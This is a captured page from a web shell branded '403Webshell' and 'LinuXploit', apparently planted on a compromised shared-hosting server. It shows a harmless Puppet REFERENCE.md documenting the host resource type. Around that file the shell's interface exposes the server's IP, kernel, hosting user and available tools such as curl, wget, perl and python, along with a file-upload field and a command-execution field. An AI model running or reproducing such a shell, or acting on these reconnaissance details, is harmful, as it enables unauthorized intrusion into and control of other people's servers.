403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.17.156.51
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/puppetlabs/puppet/vendor_modules/host_core/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/puppetlabs/puppet/vendor_modules/host_core//REFERENCE.md
# Reference

<!-- DO NOT EDIT: This document was generated by Puppet Strings -->

## Table of Contents

### Resource types

* [`host`](#host): Installs and manages host entries.

## Resource types

### <a name="host"></a>`host`

For most systems, these entries will just be in `/etc/hosts`, but some
systems (notably OS X) will have different solutions.

#### Properties

The following properties are available in the `host` type.

##### `comment`

A comment that will be attached to the line with a # character.

##### `ensure`

Valid values: `present`, `absent`

The basic property that the resource should be in.

Default value: `present`

##### `host_aliases`

Any aliases the host might have.  Multiple values must be
specified as an array.

##### `ip`

The host's IP address, IPv4 or IPv6.

##### `target`

The file in which to store service information.  Only used by
those providers that write to disk. On most systems this defaults to `/etc/hosts`.

#### Parameters

The following parameters are available in the `host` type.

* [`name`](#-host--name)
* [`provider`](#-host--provider)

##### <a name="-host--name"></a>`name`

namevar

The host name.

##### <a name="-host--provider"></a>`provider`

The specific backend to use for this `host` resource. You will seldom need to specify this --- Puppet will usually
discover the appropriate provider for your platform.


Youez - 2016 - github.com/yon3zu
LinuXploit